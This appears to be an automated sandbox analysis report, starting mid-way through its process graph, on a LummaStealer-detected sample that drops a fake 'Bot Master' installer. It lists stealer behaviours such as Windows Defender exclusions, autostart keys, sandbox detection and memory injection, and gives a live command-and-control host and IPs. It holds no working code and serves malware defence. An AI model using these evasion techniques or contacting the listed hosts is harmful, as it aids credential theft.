Adds extensions / path to Windows Defender exclusion list 14->157 30 cmd.exe 14->30         started        32 conhost.exe 16->32         started        109 127.0.0.1 unknown unknown 18->109 34 conhost.exe 18->34         started        36 conhost.exe 18->36         started        38 conhost.exe 18->38         started        40 2 other processes 18->40 file6 signatures7 process8 dnsIp9 117 title-formula.at.ply.gg 209.25.140.212, 15762, 49734 COGECO-PEER1CA Canada 21->117 81 C:\Users\user\AppData\Local\...\Cookies, SQLite 21->81 dropped 83 C:\Users\user\AppData\Roaming\XClient.exe, PE32 21->83 dropped 139 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 21->139 141 Protects its processes via BreakOnTermination flag 21->141 143 Creates multiple autostart registry keys 21->143 147 2 other signatures 21->147 42 schtasks.exe 21->42         started        85 C:\Program Files (x86)\...\WebView2Loader.dll, PE32 26->85 dropped 87 C:\Program Files (x86)\...\WebView2Loader.dll, PE32+ 26->87 dropped 89 C:\Program Files (x86)\...\WebView2Loader.dll, PE32+ 26->89 dropped 91 19 other files (none is malicious) 26->91 dropped 44 BotMaster.exe 26->44         started        145 Adds extensions / path to Windows Defender exclusion list 28->145 47 powershell.exe 23 28->47         started        49 conhost.exe 28->49         started        51 WinUpdate.exe 30->51         started        54 conhost.exe 30->54         started        file10 signatures11 process12 dnsIp13 56 conhost.exe 42->56         started        119 botmaster.mediaplus.me 173.248.130.117, 49738, 80 WEHOSTWEBSITES-COMUS United States 44->119 121 172.217.18.142 GOOGLEUS United States 44->121 58 msedgewebview2.exe 44->58         started        131 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 51->131 133 Writes to foreign memory regions 51->133 135 Allocates memory in foreign processes 51->135 137 2 other signatures 51->137 62 cmd.exe 51->62         started        64 Botmaster 5.8 direct.exe 51->64         started        66 aspnet_compiler.exe 51->66         started        signatures14 process15 file16 97 C:\...\the-real-index~RF623b08.TMP (copy), VAX 58->97 dropped 99 C:\Users\user\...\the-real-index (copy), VAX 58->99 dropped 101 C:\Users\user\AppData\Roaming\...\temp-index, VAX 58->101 dropped 161 Found strings related to Crypto-Mining 58->161 68 msedgewebview2.exe 58->68         started        71 msedgewebview2.exe 58->71         started        73 msedgewebview2.exe 58->73         started        79 5 other processes 58->79 163 Adds extensions / path to Windows Defender exclusion list 62->163 75 conhost.exe 62->75         started        77 powershell.exe 62->77         started        signatures17 process18 dnsIp19 111 20.25.227.174, 443, 49763, 49765 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 68->111 113 204.79.197.239 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 68->113 115 5 other IPs or domains 68->115

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe50%ReversingLabsByteCode-MSIL.Trojan.LummaStealer
                  SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe60%VirustotalBrowse
                  SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe100%AviraTR/AD.Nekark.gdavo
                  SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exe0%ReversingLabs
                  C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exe0%VirustotalBrowse
                  C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.Bcl.AsyncInterfaces.dll0%ReversingLabs
                  C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.Bcl.AsyncInterfaces.dll0%VirustotalBrowse
                  C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.VisualStudio.OLE.Interop.dll0%ReversingLabs
                  C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.VisualStudio.OLE.Interop.dll0%VirustotalBrowse
                  C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.VisualStudio.Shell.Interop.dll0%ReversingLabs
                  C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.VisualStudio.Shell.Interop.dll0%VirustotalBrowse
                  C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.VisualStudio.TextManager.Interop.dll0%ReversingLabs
                  C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.VisualStudio.TextManager.Interop.dll0%VirustotalBrowse
                  C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.Web.WebView2.Core.dll0%ReversingLabs
                  C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.Web.WebView2.Core.dll0%VirustotalBrowse
                  C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.Web.WebView2.WinForms.dll0%ReversingLabs
                  C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.Web.WebView2.WinForms.dll0%VirustotalBrowse
                  C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.Web.WebView2.Wpf.dll0%ReversingLabs
                  C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.Web.WebView2.Wpf.dll0%VirustotalBrowse
                  C:\Program Files (x86)\Bot Master\Bot Master\Newtonsoft.Json.dll0%ReversingLabs
                  C:\Program Files (x86)\Bot Master\Bot Master\Newtonsoft.Json.dll0%VirustotalBrowse
                  C:\Program Files (x86)\Bot Master\Bot Master\System.Buffers.dll0%ReversingLabs
                  C:\Program Files (x86)\Bot Master\Bot Master\System.Buffers.dll0%VirustotalBrowse
                  C:\Program Files (x86)\Bot Master\Bot Master\System.Memory.dll0%ReversingLabs
                  C:\Program Files (x86)\Bot Master\Bot Master\System.Memory.dll0%VirustotalBrowse
                  C:\Program Files (x86)\Bot Master\Bot Master\System.Numerics.Vectors.dll0%ReversingLabs
                  C:\Program Files (x86)\Bot Master\Bot Master\System.Numerics.Vectors.dll0%VirustotalBrowse
                  C:\Program Files (x86)\Bot Master\Bot Master\System.Runtime.CompilerServices.Unsafe.dll0%ReversingLabs
                  C:\Program Files (x86)\Bot Master\Bot Master\System.Runtime.CompilerServices.Unsafe.dll0%VirustotalBrowse
                  C:\Program Files (x86)\Bot Master\Bot Master\System.Text.Encodings.Web.dll0%ReversingLabs
                  C:\Program Files (x86)\Bot Master\Bot Master\System.Text.Encodings.Web.dll0%VirustotalBrowse
                  C:\Program Files (x86)\Bot Master\Bot Master\System.Text.Json.dll0%ReversingLabs
                  C:\Program Files (x86)\Bot Master\Bot Master\System.Text.Json.dll0%VirustotalBrowse
                  C:\Program Files (x86)\Bot Master\Bot Master\System.Threading.Tasks.Extensions.dll0%ReversingLabs
                  C:\Program Files (x86)\Bot Master\Bot Master\System.Threading.Tasks.Extensions.dll0%VirustotalBrowse
                  C:\Program Files (x86)\Bot Master\Bot Master\System.ValueTuple.dll0%ReversingLabs
                  C:\Program Files (x86)\Bot Master\Bot Master\Uninstall.exe5%ReversingLabs
                  C:\Program Files (x86)\Bot Master\Bot Master\app.publish\BotMaster.exe0%ReversingLabs
                  C:\Program Files (x86)\Bot Master\Bot Master\runtimes\win-arm64\native\WebView2Loader.dll0%ReversingLabs
                  C:\Program Files (x86)\Bot Master\Bot Master\runtimes\win-x64\native\WebView2Loader.dll0%ReversingLabs
                  C:\Program Files (x86)\Bot Master\Bot Master\runtimes\win-x86\native\WebView2Loader.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\WinUpdate.exe50%ReversingLabsByteCode-MSIL.Trojan.LummaStealer

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  chrome.cloudflare-dns.com0%VirustotalBrowse
                  botmaster.mediaplus.me0%VirustotalBrowse
                  msftstore.s.llnwi.net0%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  https://anglebug.com/73820%URL Reputationsafe
                  http://www.chambersign.org10%URL Reputationsafe
                  http://unisolated.invalid/0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://anglebug.com/69290%URL Reputationsafe
                  https://anglebug.com/73690%URL Reputationsafe
                  http://anglebug.com/47220%URL Reputationsafe
                  http://anglebug.com/36230%URL Reputationsafe
                  http://anglebug.com/36250%URL Reputationsafe
                  http://anglebug.com/36240%URL Reputationsafe
                  http://anglebug.com/38620%URL Reputationsafe
                  https://anglebug.com/71610%URL Reputationsafe
                  https://anglebug.com/71620%URL Reputationsafe
                  http://anglebug.com/25170%URL Reputationsafe
                  http://anglebug.com/49370%URL Reputationsafe
                  https://login.windows.local/0%URL Reputationsafe
                  http://anglebug.com/38320%URL Reputationsafe
                  https://tg.602.com0%Avira URL Cloudsafe
                  https://dns.sb/privacy/Char0%Avira URL Cloudsafe
                  https://www.91duba.com/?f=0%Avira URL Cloudsafe
                  http://anglebug.com/5750)0%Avira URL Cloudsafe
                  http://crl.ver)0%Avira URL Cloudsafe
                  https://easyauth.edgebrowser.microsoft-staging-falcon.io/0%Avira URL Cloudsafe
                  http://df.edge.qhkj.baicana.com0%Avira URL Cloudsafe
                  https://dns.sb/privacy/Char2%VirustotalBrowse
                  http://anglebug.com/7724ancedG0%Avira URL Cloudsafe
                  https://easyauth.edgebrowser.microsoft-staging-falcon.io/0%VirustotalBrowse
                  https://tg.602.com0%VirustotalBrowse
                  https://permanently-removed.invalid/v1/issuetoken0%Avira URL Cloudsafe
                  http://anglebug.com/7724ancedG0%VirustotalBrowse
                  http://anglebug.com/5750)0%VirustotalBrowse
                  http://df.edge.qhkj.baicana.com1%VirustotalBrowse
                  https://www.91duba.com/?f=0%VirustotalBrowse
                  https://easyauth.edgebrowser.microsoft-testing-falcon.io/0%Avira URL Cloudsafe
                  https://easyauth.edgebrowser.microsoft-testing-falcon.io/0%VirustotalBrowse
                  https://permanently-removed.invalid/reauth/v1beta/users/0%Avira URL Cloudsafe
                  http://permanently-removed.invalid/0%Avira URL Cloudsafe
                  http://r.emsoso.cn0%Avira URL Cloudsafe
                  http://sgcs.edge.ker58.com0%Avira URL Cloudsafe
                  https://permanently-removed.invalid/RotateBoundCookies0%Avira URL Cloudsafe
                  http://anglebug.com/588100%Avira URL Cloudsafe
                  https://discovery.lenovo.com.cn/home062291100%Avira URL Cloudphishing
                  https://designerapp-int.azurewebsites.net/0%Avira URL Cloudsafe
                  https://www.whatsapp.comAAA0CEDDC5F8DF7DB7FCB9C5C60)0%Avira URL Cloudsafe
                  http://r.emsoso.cn0%VirustotalBrowse
                  https://discovery.lenovo.com.cn/home0622911%VirustotalBrowse
                  https://www.quad9.net/home/privacy/0%Avira URL Cloudsafe
                  https://docs.microsoft.c0%Avira URL Cloudsafe
                  http://www.founder.com.cn/cn0%Avira URL Cloudsafe
                  https://www.quad9.net/home/privacy/1%VirustotalBrowse
                  https://permanently-removed.invalid/Logout0%Avira URL Cloudsafe
                  https://static.whatsapp.net-0%Avira URL Cloudsafe
                  http://anglebug.com/588100%VirustotalBrowse
                  http://sgcs.edge.ker58.com0%VirustotalBrowse
                  https://designerapp-int.azurewebsites.net/0%VirustotalBrowse
                  http://www.founder.com.cn/cn0%VirustotalBrowse

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  mmx-ds.cdn.whatsapp.net
                  		31.13.65.49
                  		truefalse
                    		high
                    chrome.cloudflare-dns.com
                    		172.64.41.3
                    		truefalseunknown
                    botmaster.mediaplus.me
                    		173.248.130.117
                    		truefalseunknown
                    msftstore.s.llnwi.net
                    		68.142.107.4
                    		truefalseunknown
                    title-formula.at.ply.gg
                    		209.25.140.212
                    		truetrue
                      		unknown
                      web.whatsapp.com
                      		unknown
                      		unknownfalse
                        		high
                        www.whatsapp.com
                        		unknown
                        		unknownfalse
                          		high
                          static.whatsapp.net
                          		unknown
                          		unknownfalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://scontent.whatsapp.net/v/t39.8562-34/317094452_674406960787691_2379683082953204863_n.png?ccb=1-7&_nc_sid=73b08c&_nc_ohc=oR3xu8RL-Y8AX-4ifa9&_nc_ht=scontent.whatsapp.net&oh=01_AdT3h8Ax7apLe18qhzUe-P1f9GTqK1ua1QGMyu3-SLk1Zw&oe=65F20528false
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.4399.com/flash/32979.htmmsedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://hao123.di178.com/?r916msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.4399.com/flash/180977_3.htmmsedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://tg.602.commsedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://dns.sb/privacy/Charmsedgewebview2.exe, 00000020.00000002.3641112283.00001B440000C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • 2%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://anglebug.com/7382msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323248288.000030DC00178000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323294945.000030DC00184000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.chambersign.org1msedgewebview2.exe, 0000001D.00000002.3696502178.00002DDC0063C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designersBotMaster.exe, 0000001A.00000002.3732540068.0000000007AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.whatsapp.com/6d64fd2db8-msedgewebview2.exe, 0000001D.00000002.3704676650.00002DDC00BBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.whatsapp.com/?lang=zh_hkmsedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://static.whatsapp.net/rsrc.php/v3/yZ/r/yiagt1v2zqJ.js?_nc_x=Ij3Wp8lg5Kzmsedgewebview2.exe, 0000001D.00000002.3712703856.00002DDC01558000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3659915456.00001B440040C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://web.whatsapp.com/entrymsedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknownmsedgewebview2.exe, 0000001D.00000003.2564433283.00002DDC01128000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2566414130.00002DDC011D8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2379485108.00002DDC011B0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2367320467.00002DDC00C70000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2365404102.00002DDC01148000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2367024620.00002DDC01138000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2362928346.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2362700408.00002DDC01104000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3709381754.00002DDC00FB0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2567021699.00002DDC0150C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2365366959.00002DDC006B4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2366973993.00002DDC01128000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2379410298.00002DDC011C8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2397720050.00002DDC011D8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2420175454.00002DDC00B55000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2566304427.00002DDC01548000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2570283052.00002DDC01234000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564490059.00002DDC01138000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2389306555.00001B4400438000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2549634681.00001B440043C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2573925253.00001B440044D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://kf.07073.commsedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://unisolated.invalid/msedgewebview2.exe, 0000001D.00000002.3704048932.00002DDC00B20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://www.4399.com/flash/18012.htmmsedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.4399.com/flash/zmhj.htm#search3-6407msedgewebview2.exe, 0000001D.00000002.3695585487.00002DDC0055C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.galapagosdesign.com/DPleaseBotMaster.exe, 0000001A.00000002.3732540068.0000000007AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://www.91duba.com/?f=msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • 0%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://anglebug.com/6929msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323248288.000030DC00178000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323294945.000030DC00184000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://www.jio.com/.msedgewebview2.exe, 00000026.00000003.2529580323.00004B180119C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.4399.com/flash/217926_2.htmmsedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://anglebug.com/5750)msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • 0%, Virustotal, Browse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.4399.com/flash/218860_1.htmmsedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://int.msn.cn/msedgewebview2.exe, 0000001D.00000002.3695321952.00002DDC004B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2433733969.00002454008BC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2417511260.0000245400298000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://anglebug.com/7369msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323248288.000030DC00178000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323294945.000030DC00184000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3671436412.000030DC002A4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://scontent.whatsapp.net/v/t39.8562-34/323914620_1571722909934742_4947035793330347072_n.png?ccbmsedgewebview2.exe, 0000001D.00000003.2581084255.00002DDC01198000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.4399.com/flash/18012_4.htmmsedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://crl.ver)svchost.exe, 0000001B.00000002.3646072931.000002A2C3E12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		low
                                                                  https://www.4399.com/flash/48504.htmmsedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://easyauth.edgebrowser.microsoft-staging-falcon.io/msedgewebview2.exe, 00000026.00000003.2465710972.00004B18008A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • 0%, Virustotal, Browse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://df.edge.qhkj.baicana.commsedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • 1%, Virustotal, Browse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://issuetracker.google.com/161903006msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3666573945.000030DC00150000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3669480967.000030DC00298000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3664589668.000030DC00104000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://web.whatsapp.com/img/favicon_c5088e888c97ad440a61d247596f88e5.png9msedgewebview2.exe, 0000001D.00000002.3683468474.0000021F34D30000.00000002.00000001.00040000.0000004E.sdmpfalse
                                                                        		high
                                                                        http://anglebug.com/7724ancedGmsedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • 0%, Virustotal, Browse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://permanently-removed.invalid/v1/issuetokenmsedgewebview2.exe, 0000001D.00000002.3690058561.00002DDC0001C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2437244575.00002454009B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://easyauth.edgebrowser.microsoft-testing-falcon.io/msedgewebview2.exe, 00000026.00000003.2465710972.00004B18008A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • 0%, Virustotal, Browse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://github.com/dcodeIO/long.jsmsedgewebview2.exe, 00000020.00000003.2622810618.00001B4400804000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2389422127.00001B44004B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2419981673.00004B1800D08000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2397572939.00004B1800B48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://anglebug.com/4722msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323248288.000030DC00178000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323294945.000030DC00184000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323203239.000030DC00168000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://permanently-removed.invalid/reauth/v1beta/users/msedgewebview2.exe, 0000001D.00000003.2435163541.00002DDC00CDC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3690058561.00002DDC0001C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2562900302.00002DDC00CBC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3705489356.00002DDC00CDC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2437244575.00002454009B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://permanently-removed.invalid/msedgewebview2.exe, 0000001D.00000002.3692619147.00002DDC001BC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2436851880.0000245400980000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://r.emsoso.cnmsedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • 0%, Virustotal, Browse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://tiny.jio.com/.msedgewebview2.exe, 00000026.00000003.2529580323.00004B180119C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
